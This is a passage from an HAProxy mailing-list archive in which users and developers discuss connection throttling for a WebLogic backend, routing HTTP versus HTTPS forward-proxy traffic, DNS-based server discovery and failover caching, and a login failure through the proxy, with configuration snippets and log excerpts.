asking for trouble. I suggest you remove this.



Maybe something on your backend (conntrack or the application)
is rate-limiting per IP, or the aggressive client you are facing
is keep-aliving properly with the backend, while it doesn't when
using haproxy.


I would apply the keep-alive configurations above and I would
also suggest that you check the CPU load on your backend server
as connections through haproxy become unresponsive, because that
CPU can be saturated due to TLS negotiations as well.


That's what the haproxy log shows: the response time from the tomcat
backend is high, suggesting something is wrong. Maybe it is something you
mentioned above (which makes sense), such as some system settings; if we can
see the tomcat connector settings (and possibly logs), maybe something there
is causing the issues.



Regards,
Lukas


Re: Reg: HAProxy 1.6.12 on RHEL7.2 (MAXCONN in FRONT-END/LISTEN BLOCK)

2017-06-28 Thread Igor Cicimov
Hi all,

On Thu, Jun 29, 2017 at 11:23 AM, Velmurugan Dhakshnamoorthy <
dvel@gmail.com> wrote:

> Thanks Much Andrew,  I will definitely explore on this.
>
> Thanks again.
>
> On Jun 28, 2017 22:03, "Andrew Smalley"  wrote:
>
>> Hi Vel
>>
>> Form what you describe the example using the tarpit feature may help you
>> taken from here https://blog.codecentric.de/en
>> /2014/12/haproxy-http-header-rate-limiting/
>>
>> frontend fe_api_ssl
>>   bind 192.168.0.1:443 ssl crt /etc/haproxy/ssl/api.pem no-sslv3 ciphers ...
>>   default_backend be_api
>>
>>   tcp-request inspect-delay 5s
>>
>>   acl document_request path_beg -i /v2/documents
>>   acl is_upload hdr_beg(Content-Type) -i multipart/form-data
>>   acl too_many_uploads_by_user sc0_gpc0_rate() gt 100
>>   acl mark_seen sc0_inc_gpc0 gt 0
>>
>>   stick-table type string size 100k store gpc0_rate(60s)
>>
>>   tcp-request content track-sc0 hdr(Authorization) if METH_POST 
>> document_request is_upload
>>
>>   use_backend be_429_slow_down if mark_seen too_many_uploads_by_user
>>
>> backend be_429_slow_down
>>   timeout tarpit 2s
>>   errorfile 500 /etc/haproxy/errorfiles/429.http
>>   http-request tarpit
>>
>>
>>
>> Andrew Smalley
>>
>> Loadbalancer.org Ltd.
>> www.loadbalancer.org 
>>
>>
>> On 28 June 2017 at 10:01, Velmurugan Dhakshnamoorthy 
>> wrote:
>>
>>> Hi Lukas,
>>> Thanks for your response in length. As I mentioned earlier, I was not
>>> aware that the people from discourse forum and this email d-list group are
>>> same. I am 100% new to HAProxy.
>>>
>>> Let me explain my current situation in-detail in this email thread,
>>> Kindly check if you or other people from the group can guide me.
>>>
>>> Our requirement for HAProxy is NOT to load balance back-end (Weblogic
>>> 12c) servers; we have a single backend instance (ex: PIA1). Our server
>>> capacity is not high enough to handle the heavy traffic during peak load.
>>> The peak load occurs only 2 times a year, which is why we are not scaling
>>> up our server resources, as they would be idle the majority of the time.
>>>
>>> We would like to use HAProxy to throttle http/tcp connections during the
>>> peak load, so that the weblogic backend will not go into an Out-Of-Memory
>>> state and PeopleSoft will not crash.
>>>
>>> To achieve http throttling: when setting maxconn on the back end, HAProxy
>>> queues up further connections and releases them once the active http
>>> connections become idle. However, the way weblogic works is that once the
>>> PeopleSoft URL is accessed and the user is authenticated, a cookie is
>>> inserted into the browser and stays active by default for 20 minutes,
>>> which means that even if the user does not navigate or do anything inside
>>> the application, the cookie session state is retained in the weblogic java
>>> heap. Weblogic allocates a small amount of memory to retain each active
>>> session (though the memory allocation increases/decreases dynamically
>>> based on various business functionality). As per current capacity,
>>> weblogic can retain only 100 session states, which means I don't want to
>>> forward any further connections to weblogic until some of the 100 sessions
>>> are released (by default a session is released when the user explicitly
>>> clicks the signout button or the inactivity timeout of 20 minutes is
>>> reached).
>>>
>>> According to my understanding, maxconn on the back-end throttles
>>> connections and releases them to the back-end as and when a tcp
>>> connection's status changes to idle; but even though connections are idle,
>>> if logout/signout has not occurred in PeopleSoft, the session state is
>>> still maintained in weblogic and not released, so it cannot handle further
>>> connections.
>>>
>>> That's the reason I am setting maxconn on the front end and keeping the
>>> HTTP keep-alive option ON, so that I can throttle connections at the front
>>> end itself. According to my POC, setting maxconn on the front-end behaves
>>> differently than setting it on the back-end: when it is on the front-end,
>>> it holds further connections in the kernel, and once the existing http
>>> connections are closed, it lets further connections in; with this I don't
>>> see any performance issue for existing connections.
>>>
>>> for your information HAProxy and Weblogic are residing in a same single
>>> VM.
>>>
>>> please let me know if my above understa

Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-01 Thread Igor Cicimov
On 29 Jun 2017 2:46 am, "Daren Sefcik"  wrote:

On Wed, Jun 28, 2017 at 8:12 AM, Olivier Doucet  wrote:

> Hi,
>
>
> 2017-06-28 16:47 GMT+02:00 Daren Sefcik :
>
>> Hi, I have searched for an answer to this and tried several things but
>> cannot seem to figure it out so am hoping someone can point me in the right
>> direction. I have different backend proxy servers (squid) setup to handle
>> specifically HTTP and HTTPS traffic but cannot figure out how to tell
>> haproxy to tell the difference and send appropriately.
>>
>> For example, I have
>>
>> frontend proxy_servers
>> backend http_proxies
>> backend https_proxies
>>
>> how can I tell frontend to send all http traffic to backend http_proxies
>> and all https traffic to https_backend? I have tried using dst_port 443 and
>> the acl https ssl_fc but nothing seems to distinguish https traffic.
>>
>
> Well, it should work. Send a copy of your config to see what's wrong in
> it.
>
> Olivier
>
>
>
>>
>> TIA...
>>
>
>
Here is an example, it continues to direct all https traffic to the web
proxy and not the streaming media one.

frontend HTPL_PROXY
bind 10.1.4.105:8181 name 10.1.4.105:8181
mode http
log global
option http-server-close
option forwardfor
acl https ssl_fc
http-request set-header X-Forwarded-Proto http if !https
http-request set-header X-Forwarded-Proto https if https
maxconn 9
timeout client 1
option tcp-smart-accept
acl is_youtube hdr_sub(host) -i youtube.com
acl is_netflix hdr_sub(host) -i netflix.com
acl is_nflixvideo hdr_sub(host) -i nflxvideo.net
acl is_googlevideo hdr_sub(host) -i googlevideo.com
acl is_google hdr_sub(host) -i google.com
acl is_pandora hdr_sub(host) -i pandora.com
acl is_https dst_port eq 443
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY if is_youtube
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY if is_netflix
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY if is_nflixvideo
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY if is_googlevideo
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY if is_pandora
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY if is_https
default_backend HTPL_WEB_PROXY_http_ipvANY

Obviously the dst_port 443 method cannot work since you are listening on port
8181. Since both protocols arrive on the same port, you can try tcp mode:

mode tcp
option tcplog
bind *:8181

tcp-request inspect-delay 5s
acl is_ssl req.ssl_hello_type 1
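
Putting those fragments together with the routing rules, a complete frontend
sketch (using the backend names from the original question; note that
req.ssl_hello_type needs the inspect delay so the ClientHello can be
buffered) might look like:

    frontend fe_proxy
        mode tcp
        option tcplog
        bind *:8181

        # buffer the first bytes so a possible TLS ClientHello can be inspected
        tcp-request inspect-delay 5s
        # accept as soon as we see either a ClientHello or a plain HTTP request
        tcp-request content accept if { req.ssl_hello_type 1 } or HTTP

        acl is_ssl req.ssl_hello_type 1
        use_backend https_proxies if is_ssl
        default_backend http_proxies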


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On 3 Jul 2017 6:47 am, "Daren Sefcik"  wrote:

On Sat, Jul 1, 2017 at 4:39 PM, Igor Cicimov  wrote:

>
>
> On 29 Jun 2017 2:46 am, "Daren Sefcik"  wrote:
>
> On Wed, Jun 28, 2017 at 8:12 AM, Olivier Doucet 
> wrote:
>
>> Hi,
>>
>>
>> 2017-06-28 16:47 GMT+02:00 Daren Sefcik :
>>
>>> Hi, I have searched for an answer to this and tried several things but
>>> cannot seem to figure it out so am hoping someone can point me in the right
>>> direction. I have different backend proxy servers (squid) setup to handle
>>> specifically HTTP and HTTPS traffic but cannot figure out how to tell
>>> haproxy to tell the difference and send appropriately.
>>>
>>> For example, I have
>>>
>>> frontend proxy_servers
>>> backend http_proxies
>>> backend https_proxies
>>>
>>> how can I tell frontend to send all http traffic to backend http_proxies
>>> and all https traffic to https_backend? I have tried using dst_port 443 and
>>> the acl https ssl_fc but nothing seems to distinguish https traffic.
>>>
>>
>> Well, it should work. Send a copy of your config to see what's wrong in
>> it.
>>
>> Olivier
>>
>>
>>
>>>
>>> TIA...
>>>
>>
>>
> Here is an example, it continues to direct all https traffic to the web
> proxy and not the streaming media one.
>
> frontend HTPL_PROXY
>   bind 10.1.4.105:8181 name 10.1.4.105:8181
>   mode http
>   log global
>   option  http-server-close
>   option  forwardfor
>   acl https ssl_fc
>   http-request set-header X-Forwarded-Proto http if !https
>   http-request set-header X-Forwarded-Proto https if https
>   maxconn 9
>   timeout client  1
>   option tcp-smart-accept
>   acl is_youtube  hdr_sub(host) -i youtube.com
>   acl is_netflix  hdr_sub(host) -i netflix.com
>   acl is_nflixvideo   hdr_sub(host) -i nflxvideo.net
>   acl is_googlevideo  hdr_sub(host) -i googlevideo.com
>   acl is_google   hdr_sub(host) -i google.com
>   acl is_pandora  hdr_sub(host) -i pandora.com
>   acl is_https dst_port eq 443
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_youtube
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_netflix
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_nflixvideo
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_googlevideo
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_pandora
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_https
>   default_backend HTPL_WEB_PROXY_http_ipvANY
>
> Obviously the dst_port 443 method cannot work since you are listening on port
> 8181. Since both protocols arrive on the same port, you can try tcp mode:
>
> mode tcp
> option tcplog
> bind *:8181
>
> tcp-request inspect-delay 5s
> acl is_ssl req.ssl_hello_type 1
>
>

Thank you, I have tried that with the below config and it still sends all
traffic to the default backend instead of my ssl backend, any other ideas?

frontend HTPL_PROXY
bind 10.1.4.105:8181 name 10.1.4.105:8181

mode tcp
log global
maxconn 9
timeout client  1
option tcp-smart-accept
tcp-request inspect-delay 5s
acl is_ssl  req.ssl_hello_type 1
use_backend HTPL_SSL_PROXY_tcp_ipvANY  if  is_ssl
default_backend HTPL_WEB_PROXY_tcp_ipvANY

The only explanation I can see is that no ssl traffic is hitting haproxy, at
least not on port 8181.


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On 3 Jul 2017 8:35 am, "Igor Cicimov" 
wrote:



On 3 Jul 2017 6:47 am, "Daren Sefcik"  wrote:

Thank you, I have tried that with the below config and it still sends all
traffic to the default backend instead of my ssl backend, any other ideas?

frontend HTPL_PROXY
bind 10.1.4.105:8181 name 10.1.4.105:8181

mode tcp
log global
maxconn 9
timeout client  1
option tcp-smart-accept
tcp-request inspect-delay 5s
acl is_ssl  req.ssl_hello_type 1
use_backend HTPL_SSL_PROXY_tcp_ipvANY  if  is_ssl
default_backend HTPL_WEB_PROXY_tcp_ipvANY

The only explanation I can see is that no ssl traffic is hitting haproxy, at
least not on port 8181.

Or the IP it is bound to.


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On Mon, Jul 3, 2017 at 9:44 AM, Michael Ezzell  wrote:

>
>
> On Jul 2, 2017 19:15, "Daren Sefcik"  wrote:
>
>
> Most of the traffic is ssl, for example gmail, facebook, pandora all force
> https.
>
>
> I'm going to go out on a limb and suggest that *none* of the traffic is
> SSL in any sense that is meaningful from HAProxy's perspective.
>
> What do the HTTPS requests look like in the HAProxy logs?  Aren't they
> CONNECT requests?
>

I was going to go even further and ask for a tcpdump capture on the haproxy
port :-)


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On Mon, Jul 3, 2017 at 10:38 AM, Daren Sefcik 
wrote:

>
> On Sun, Jul 2, 2017 at 4:44 PM, Michael Ezzell  wrote:
>
>>
>>
>> On Jul 2, 2017 19:15, "Daren Sefcik"  wrote:
>>
>>
>> Most of the traffic is ssl, for example gmail, facebook, pandora all
>> force https.
>>
>>
>> I'm going to go out on a limb and suggest that *none* of the traffic is
>> SSL in any sense that is meaningful from HAProxy's perspective.
>>
>> What do the HTTPS requests look like in the HAProxy logs?  Aren't they
>> CONNECT requests?
>>
>>
> yep, pretty much..I just need some help to figure out how to make it
> work
>
> example log entries for https and http; you can see how the "443" goes to
> one backend and the regular http "GET" request goes to another..but this
> is not consistent and I know there has to be a better way..
>
> HTPL_PROXY HTPL_SSL_PROXY_http_ipvANY/HTPL-PROXY-03_10.1.4.180
> 0/0/0/22/10075 200 525 - - cD-- 124/124/103/103/0 0/0 "CONNECT
> caltopo.com:443 HTTP/1.1"
>
> HTPL_PROXY HTPL_WEB_PROXY_http_ipvANY/HTPL-PROXY-04_10.1.4.181
> 92/0/0/1/93 403 4309 - -  126/126/10/11/0 0/0 "GET
> http://i2.wp.com/n4.nabble.com/images/avatar100.png HTTP/1.1"
>
>
> TIA for any help with this..!
>

Is it possible that *some* of the clients have issues talking to the
haproxy over ssl? You say that in the case of ssl it is not 100% successful,
but what does that mean? How does this manifest? Can you track an ssl request
from a particular client ending up on the http backend?

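Since clients of a forward proxy issue plain-text CONNECT requests for https
sites (as Michael's question about the logs suggests), a hedged alternative,
not proposed in the thread, is to stay in http mode and route on the request
method, so no TLS detection is needed at all (backend names shortened from the
config above are assumptions):

    frontend HTPL_PROXY
        mode http
        bind 10.1.4.105:8181

        # proxy clients tunnel TLS via "CONNECT host:443" requests
        acl is_connect method CONNECT
        use_backend HTPL_SSL_PROXY if is_connect
        default_backend HTPL_WEB_PROXY
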

DNS resolver for backend with server/service with multiple IP's

2017-07-03 Thread Igor Cicimov
Hi,

If I remember correctly, there was a feature talked about on the
mailing list, which was said to make it into 1.7, where the
dns-resolver can work with dns records that return multiple IPs, like, let's
say:

root@ip-10-77-0-94:~# dig +short tomcat.service.consul A
10.77.4.234
10.77.3.227

and account for all the records returned (until 1.6 the resolver was grabbing
only the first IP returned) in terms of load balancing. So I'm testing this
with 1.7.7 like this:

server tomcats tomcat.service.consul:8080 check resolvers dns_resolvers
resolve-prefer ipv4

instead of:

server tomcat1 10.77.4.234:8080 check resolvers dns_resolvers
resolve-prefer ipv4
server tomcat2 10.77.3.227:8080 check resolvers dns_resolvers
resolve-prefer ipv4

to load balance between all the IPs, but I am seeing log messages like
this:

Jul  3 17:13:15 ip-10-77-0-94 haproxy[22902]: tomcats/tomcats changed its
IP from 10.77.3.227 to 10.77.4.234 by dns_resolvers/dns0.

So does this mean the feature is not implemented yet?

​Thanks,
Igor​


Re: DNS resolver for backend with server/service with multiple IP's

2017-07-03 Thread Igor Cicimov
On Mon, Jul 3, 2017 at 11:52 PM, Baptiste  wrote:

>
>
> On Mon, Jul 3, 2017 at 9:32 AM, Igor Cicimov  com> wrote:
>
>> Hi,
>>
>> If I remember correctly, there was a feature that was talked about on the
>> mailing list, and was said it should make it into 1.7, where the
>> dns-resolver can work with dns records that return multiple IP's, like lets
>> say:
>>
>> root@ip-10-77-0-94:~# dig +short tomcat.service.consul A
>> 10.77.4.234
>> 10.77.3.227
>>
>> and account for all records returned (till 1.6 the resolver was grabbing
>> only the first IP returned) in terms of load balancing. So I'm testing this
>> with 1.7.7 like this:
>>
>> ​​
>> server tomcats tomcat.service.consul:8080 check resolvers dns_resolvers
>> resolve-prefer ipv4
>>
>> ​instead of:
>>
>> ​​server tomcat1 10.77.4.234:8080 check resolvers dns_resolvers
>> resolve-prefer ipv4
>> ​server tomcat2 10.77.3.227:8080 check resolvers dns_resolvers
>> resolve-prefer ipv4
>>
>> ​to load balance between all ip's, but seeing in the logs messages like
>> this:
>>
>> Jul  3 17:13:15 ip-10-77-0-94 haproxy[22902]: tomcats/tomcats changed its
>> IP from 10.77.3.227 to 10.77.4.234 by dns_resolvers/dns0.
>>
>> ​so does this mean the feature is not implemented yet?​
>>
>> ​Thanks,
>> Igor​
>>
>>
>
> Hi Igor,
>
> For now, you can't replace a couple of "hard coded" server lines by a
> single server line with DNS enabled.
> The second case will make you have in the end a single server in the
> backend.
>
> HAProxy 1.8 will bring the features you need:
> 1. use the server-template line to configure 2 servers (or more) in
> HAProxy while using a single configuration line
> 2. a cache of the DNS response has been implemented and each time a record
> is used, it is internally moved to the bottom of the list, so all IPs will
> be used as best as possible
>
> Example with server-template to apply to your example:
>   server-template tomcat 2 tomcat.service.consul:8080 check resolvers
> dns_resolvers resolve-prefer ipv4
>
> I would also recommend setting 'init-addr none' to prevent HAProxy from
> using libc at configuration parsing. I saw some deployments where the host
> below HAProxy was not able to resolve an IP address from a consul
> endpoint.
>
> Baptiste
>

That's awesome, thanks Baptiste! I also appreciate the valuable input
regarding consul. So excited, can't wait to try this the moment 1.8 shows
up in the ppa.

Cheers,
Igor
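
Combining Baptiste's points into one sketch (the resolver's nameserver
address and the backend name are assumptions; server-template requires
HAProxy 1.8+):

    resolvers dns_resolvers
        nameserver dns0 10.77.0.2:53
        hold valid 10s

    backend be_tomcat
        # expands to up to 2 servers from the consul DNS answer
        server-template tomcat 2 tomcat.service.consul:8080 check resolvers dns_resolvers resolve-prefer ipv4 init-addr none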


Re: Reg: HAProxy 1.6.12 on RHEL7.2 (MAXCONN in FRONT-END/LISTEN BLOCK)

2017-07-03 Thread Igor Cicimov
On Tue, Jul 4, 2017 at 1:34 PM, Velmurugan Dhakshnamoorthy <
dvel@gmail.com> wrote:

> Thanks much for detailed explanation.
>
> Once the limit of 100 sessions are reached, note we are talking about *100
> sessions in Weblogic* and *NOT 100 connections to the backend*, what is
> the Weblogic server going to do? We need to understand what happens on
> Weblogic side once the 101st session is accepted. You get error 500
> straight away or something else happens? Maybe nothing and the request gets
> dropped after sitting in the Weblogic queue for some time?
>
> [Vel] once the limit (100) is reached in weblogic, the 101st user will
> receive error 500, an OOM (OutOfMemory) error in the weblogic back-end.
> When OOM occurs, even connected users' responses will be impacted.
>
> Regards,
> Vel
>
>
Well, the biggest issue you have is that the number of connections is not the
same as the number of sessions. Let's say you have reached your 100-connection
limit, which corresponds to 100 sessions in WL, and one client's browser
starts closing its connections. For HAP the number of connections will drop
below 100, let's say to 96, and it is possible that at that moment a new
user gets connected, which will cause WL to create a new 101st session and
crash. So how are you going to solve this dependency between connections on
the HAP side and sessions on the WL side?

Another thing is that modern browsers can open up to 6-7 connections to a
single domain name, which potentially leaves you with fewer than 20 users
during the overload period with the limitation of 100 connections in HAP.
Also, depending on user activity, since every time the user is active WL
restarts the session timer to 20 min, you might end up with fewer than 20
users connected for a long, long time.
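
For reference, the front-end throttling Vel describes would look roughly like
the sketch below (names, ports, and the limit are assumptions, and the
connections-vs-sessions mismatch discussed here still applies):

    frontend fe_peoplesoft
        bind *:8000
        mode http
        option http-keep-alive
        # excess connections queue in the kernel until a slot frees up
        maxconn 100
        default_backend be_weblogic

    backend be_weblogic
        mode http
        # weblogic runs on the same VM per Vel's description
        server pia1 127.0.0.1:8080 check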


Re: HAProxy failover - DNS change cached by IE for a long time

2017-07-07 Thread Igor Cicimov
On 28 Jun 2017 12:45 am, "Norman Branitsky" 
wrote:

Using the NS1 managed DNS service, I monitor the health of 2 HAProxy 1.7.7
servers defined as peers.

Not related to the OP, but 1.7.8 was just released with some important fixes.

NS1 checks the health of the HAProxy servers every 30 seconds.

This is too long for production; dns load-balancing health checks should run
every 10 seconds or less, if allowed by the provider.

If haproxy1 fails to respond, NS1 changes the DNS response to point to
haproxy2.

When haproxy1 comes back online, NS1 reverts the DNS response to haproxy1.

NS1 checks the health of my Java application server every 60 seconds.

NS1 DNS records looks like this:

haproxy1 A record

haproxy2 A record

tm1  CNAME record “Dynamic” – NS1 “filter” returns the first in the
list of all healthy haproxy servers

vr   CNAME record pointing to tm1 – name of the Java application server



It's not clear what the TTL of the records is, though? Is it equal to the
health check interval for each? In that case, shouldn't the intervals for
haproxy and the app be the same, i.e. 30 seconds? You can potentially hit the
scenario where the client caches the dns for 60 seconds while haproxy failed
over (tm1 changed) 30 seconds earlier.

If I connect to my Java application with Chrome or Firefox, I often don’t
notice the haproxy DNS failover.

If I do get a connection error, it almost always reconnects within seconds.

I don’t lose my session.



If I connect to my Java application with IE (only tested IE10 mode so far),
the haproxy DNS failover cause a DNS error.

This error won’t clear for at least 20 minutes.

Is this the session lifetime? What does it have to do with dns, I wonder?
What is the dns cache ttl in ie10 set to (I never use IE, so no idea)? And
is it tunable?

If I open a new tab I connect instantly.

Since the JSESSIONID cookie is still available, I’m still logged in but
obviously not on the same data entry page.

What can I do to kick IE in the head and cause it to refresh its DNS cache?
It doesn’t seem to respect the TTL value.

Nothing. This is a common problem with dns load balancing: if the client
doesn't respect the ttl, you can't do anything about it. Although one problem
I see is the single record NS1 returns for your app dns. Usually you want it
to return both haproxy A records in round-robin order, so (some) clients can
try the second one if the first one fails before they make a new dns query.
I've never used NS1, so I'm not sure if this functionality exists at all.
Also, is NS1 always returning the same A record out of the two (looks like
the case if it uses sorting)? In that case all clients will connect to the
same haproxy (not sure if you want/need this active-passive setup though).

Norman




*Norman Branitsky *Cloud Architect

MicroPact

(o) 416.916.1752

(c) 416.843.0670

(t) 1-888-232-0224 x61752

www.micropact.com

Think it > Track it > Done


RE: HAProxy failover - DNS change cached by IE for a long time

2017-07-08 Thread Igor Cicimov
On 8 Jul 2017 2:58 am, "Norman Branitsky" 
wrote:

I changed the TTL on my application’s DNS entry, to no avail.

Try tuning these parameters in the JVM, assuming Sun/Oracle JDK here:

-Dsun.net.inetaddr.ttl=value
-Dsun.net.inetaddr.negative.ttl=value

If a security manager is installed system-wide, by adding a line containing

networkaddress.cache.ttl=value

in $JAVA_HOME/jre/lib/security/java.security

JDK 1.6, 1.7 & 1.8 default cache setting:

30 secs (When a security manager is not set)
-1   (When a security manager is set)

* DNS Cache is refreshed every 30 seconds

So adjust the value to some low value of 10 sec say.

Once the DNS entry updates to point to the 2nd HAProxy server,

IE displays it’s dnserror.htm page:

“This page can’t be displayed”.

Copy/Paste the URL into a new tab and the page renders immediately.

The original tab continues to display the dnserror page –

probably for 20 minutes.





RE: HAProxy failover - DNS change cached by IE for a long time

2017-07-08 Thread Igor Cicimov
On 9 Jul 2017 12:20 pm, "Norman Branitsky" 
wrote:

Thanks for the responses.

shouldbe q931, in a private email to me, and Baptiste, both suggested I not
use DNS.
Baptiste suggested VRRP and shouldbe q931 suggested something similar using
keepalived.

I replied to shouldbe q931 thus:



As far as I know, keepalived requires a separate network interface
connecting the 2 servers

to manage the heartbeat connection.

In my case, the 2 HAProxy servers are in different Amazon AWS Availability
Zones (Data Centers)

with different network subnets.

I don’t think I can make keepalived work in this configuration.

Of course it can work, see
https://icicimov.github.io/blog/high-availability/Keepalived-in-Amazon-VPC-across-availability-zones/

Igor, you suggested 30 seconds was too long for a health check failover.

Unfortunately, that is the minimum setting that NS1 supports.

If your servers are in aws, why are you not using Route53 then? It allows
for low dns ttl, even lower than 10 sec. It has many advanced options for
load balancing and health checking; for sure it is superior compared to NS1.



The reason the NS1 Filter only returns the first healthy HAProxy is that
this configuration has been in place

for quite some time while my HAProxy servers were running version 1.5.

I’m in the process of upgrading all my HAProxy servers to version 1.7.8
with a peers section defined.

If your app does not need sticky sessions you don't need the peers setup, and
you can start using both haproxies right away. You can also set haproxy to
insert its own cookies and maintain the stickiness that way. I've been
using it like that with active-active haproxy servers for ages in AWS with
Route53 dns health checks (min hc interval is 10 seconds though, and
additional costs apply) for apps that need sticky sessions.

So I believe I can now safely change the NS1 Filter to round-robin mode.



Your suggestion to reduce the JVM ttl value sounds interesting.

I’m guessing you think this will force IE to refresh its DNS cache.



Something interesting appeared in my testing.

With haproxy1 and haproxy2 running, I connected to my app using IE.

I then shutdown haproxy1.

After 30 seconds, NS1 performed a DNS failover to haproxy2 and the IE
client complained about no connection.

(In a 2nd tab it connects immediately as usual.)

After about 20 minutes the first tab reconnected.

I then restarted haproxy1.

After 30 seconds, NS1 performed a DNS switch back to haproxy1.

Now the IE client continued to operate correctly!

It’s as if it had seen haproxy1 before so it didn’t complain on the switch
back?!?

Just confirming that returning multiple records to the clients might fix the
ie10 issue. According to
https://blogs.msdn.microsoft.com/ieinternals/2012/09/26/braindump-dns/ ie10
will cache up to 256 records for up to 30 min and will not respect the ttl.
You need to change this setting in the windows registry, which you can't
expect your customers to do.



*From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
*Sent:* July-08-17 9:14 AM
*To:* Norman Branitsky 
*Cc:* HAProxy 
*Subject:* RE: HAProxy failover - DNS change cached by IE for a long time



On 8 Jul 2017 2:58 am, "Norman Branitsky" 
wrote:

I changed the TTL on my application’s DNS entry, to no avail.

Try tuning these parameters in jvm, assuming Sun oracle jdk here:

-Dsun.net.inetaddr.ttl=value
-Dsun.net.inetaddr.negative.ttl=value

If security manager is installled System wide, by adding a line containing

networkaddress.cache.ttl=value

in $JAVA_HOME/jre/lib/security/java.security

JDK 1.6, 1.7 & 1.8 default cache setting:

30 secs (When a security manager is not set)
-1   (When a security manager is set)

* DNS Cache is refreshed every 30 seconds

So adjust the value to some low value of 10 sec say.

Once the DNS entry updates to point to the 2nd HAProxy server,
IE displays it’s dnserror.htm page:
“This page can’t be displayed”.
Copy/Paste the URL into a new tab and the page renders immediately.
The original tab continues to display the dnserror page –
probably for 20 minutes.

*From:* Norman Branitsky [mailto:norman.branit...@micropact.com]
*Sent:* June-27-17 10:44 AM
*To:* haproxy@formilux.org
*Subject:* HAProxy failover - DNS change cached by IE for a long time


Using the NS1 managed DNS service, I monitor the health of 2 HAProxy 1.7.7
servers defined as peers.

NS1 checks the health of the HAProxy servers every 30 seconds.

If haproxy1 fails to respond, NS1 changes the DNS response to point to
haproxy2.

When haproxy1 comes back online, NS1 reverts the DNS response to haproxy1.

NS1 checks the health of my Java application server every 60 seconds.

NS1 DNS records look like this:

haproxy1 A record

haproxy2 A record

tm1  CNAME record “Dynamic

Re: Seeking Assistance: HTTP Headers Conf. to Access Web Product

2017-07-19 Thread Igor Cicimov
On Wed, Jul 19, 2017 at 5:29 PM, Coscend@HAProxy <
haproxy.insig...@coscend.com> wrote:

> Attached is the correct HAProxy log output.
>
>
>
> The attachment in the previous post was from an unrelated context.
> Apologies.  Thank you for your assistance.
>
>
>
> *From:* Coscend@HAProxy [mailto:haproxy.insig...@coscend.com]
> *Sent:* Wednesday, July 19, 2017 2:16 AM
> *To:* haproxy@formilux.org
> *Subject:* Seeking Assistance: HTTP Headers Conf. to Access Web Product
>
>
>
> Hello HAProxy Community,
>
>
>
> We are seeking your assistance with the following issue we are facing with
> HAProxy being used as a reverse proxy server.  Your pointers could help us
> identify the cause of our issue and solve it.  Thank you.
>
>
>
> ISSUE
>
> =
>
> We are able to successfully access and run our Web application internally,
> bypassing HAProxy, using  URL.
>
> But through HAProxy 1.7.8, only the login page of this Web application
> loads.  Upon clicking the login button, nothing happens and we are unable
> to get past it.
>
>
>
> Below inline are the:
>
> [1] HTTP header analysis from browser inspection tool, for both successful
> application run (withOUT HAProxy) and failed run with HAProxy.
>
> Diffs: Set-Cookie header (JSESSIONID), Transfer-Encoding, Accept-encoding,
> expires, p::submit
>
> [2] HAProxy conf. with relevant frontend and backend. – we are using
> modular, multiple files.
>
> [3] HAProxy log (ATTACHED).
>
>
>
>
>
> [1] Browser inspection output:  HTTP Headers
>
> ==
>
> Successful running:  bypassing HAProxy (internally)
>
> -
>
> Request URL:http://< IP:Port>/Product.Name/wicket/bookmarkable/org.apache.
> openmeetings.web.pages.auth.SignInPage?2-1.0-signin-signin-submit
>
> Request Method:POST
>
> Status Code:200
>
> Remote Address:
>
> Referrer Policy:no-referrer-when-downgrade
>
> Response Headers
>
> view source
>
> Ajax-Location:.
>
> Cache-Control:no-cache, no-store
>
> Content-Security-Policy:default-src 'self'; style-src 'self'
> 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval';
>
> Content-Type:text/xml;charset=UTF-8
>
> Date:Mon, 17 Jul 2017 19:36:24 GMT
>
> Expires:Thu, 01 Jan 1970 00:00:00 GMT
>
> Pragma:no-cache
>
> Set-Cookie:JSESSIONID=07E88B37E0F1F42D0BBD319FDC79DB
> D0;path=/;HttpOnly
>
> Strict-Transport-Security:max-age=31536000; includeSubDomains; preload
>
> Transfer-Encoding:chunked
>
> X-Content-Type-Options:nosniff
>
> X-Frame-Options:SAMEORIGIN
>
> X-XSS-Protection:1; mode=block
>
> Request Headers
>
> view source
>
> Accept:application/xml, text/xml, */*; q=0.01
>
> Accept-Encoding:gzip, deflate
>
> Accept-Language:en-US,en;q=0.8
>
> Connection:keep-alive
>
> Content-Length:61
>
> Content-Type:application/x-www-form-urlencoded; charset=UTF-8
>
> Cookie:JSESSIONID=CD59ACAA3BCFE3F4C8A3AEBE77C52BC6
>
> DNT:1
>
> Host:< IP:Port>
>
> Origin:http://
>
> Referer:http:signin;jsessionid=
> CD59ACAA3BCFE3F4C8A3AEBE77C52BC6
>
> User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
> (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
>
> Wicket-Ajax:true
>
> Wicket-Ajax-BaseURL:signin
>
> X-Requested-With:XMLHttpRequest
>
> Query String Parameters
>
> view source
>
> view URL encoded
>
> 2-1.0-signin-signin-submit:
>
> Form Data
>
> view source
>
> view URL encoded
>
> login:<…>
>
> pass:<…>
>
> p::submit:1
>
>
>
>
>
> FAILED LOGIN via HAProxy
>
> ---
>
> Request URL:https:wicket/
> bookmarkable/org.apache.openmeetings.web.pages.auth.
> SignInPage?1-1.2-signin
>
> Request Method:POST
>
> Status Code:400
>
> Remote Address::443
>
